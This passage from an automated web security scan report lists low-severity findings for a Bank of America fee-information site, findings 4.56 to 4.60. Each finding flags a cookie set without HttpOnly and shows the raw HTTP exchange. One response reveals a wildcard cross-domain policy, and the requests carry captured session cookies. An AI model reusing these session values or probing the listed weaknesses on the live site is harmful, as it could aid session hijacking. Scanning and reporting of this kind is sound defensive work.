Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:12:59 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1be-5bab-4ab460cb39a00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 23467
Content-Type: application/x-javascript
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:12:59 GMT;path=/

/*! SWFObject v2.1 <http://code.google.com/p/swfobject/>
Copyright (c) 2007-2008 Geoff Stearns, Michael Williams, and Bobby van der Sluis
This software is released under the MIT License <http://www.
...[SNIP]...

4.56. http://factsaboutfees.bankofamerica.com/assets/swf/shell.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/swf/shell.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:05 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/swf/shell.swf HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:05 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1bb-286af-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 165551
Content-Type: application/x-shockwave-flash
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:05 GMT;path=/

CWS ....x....TT....O.B.$t..i.B.....I.Eh..........u...1....." Y....TP..
..E.ED..i..........{.{o.....^.<..S.k...v..&...."6.4 p....'.....H.%.~...Fq....RWP.. .......]....,!z.|.s..E\.eK#.=....8.5...J.a...
...[SNIP]...

4.57. http://factsaboutfees.bankofamerica.com/assets/video/1A.flv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/video/1A.flv

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:08 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/video/1A.flv HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/assets/swf/shell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Date: Thu, 06 Oct 2011 14:13:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:08 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /assets/video/1A.flv was not found on this server.</p
...[SNIP]...

4.58. http://factsaboutfees.bankofamerica.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/crossdomain.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:33 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /crossdomain.xml HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://webmedia.bankofamerica.com/factsaboutfees/11505-JanMaint/assets/flash/shell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:33 GMT
Server: Apache-Coyote/1.1
ETag: W/"303-1314217242000"
Last-Modified: Wed, 24 Aug 2011 20:20:42 GMT
Content-Type: application/xml
Content-Length: 303
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:33 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitte
...[SNIP]...

4.59. http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/manage-credit-card-fees/transaction-fees-and-aprs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:27 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /manage-credit-card-fees/transaction-fees-and-aprs/ HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660; cmRS=&t1=1317910414492&t2=1317910435531&t3=1317910439114&lti=1317910439114&ln=&hr=http%3A//factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/&fti=&fn=&ac=&fd=&uer=&fu=&pi=Facts%20About%20Fees%20%7C%20Bank%20of%20America%20%28%29&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

4.60. http://factsaboutfees.bankofamerica.com/servlets/Qanda previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/servlets/Qanda

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlets/Qanda?format=JSON HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLb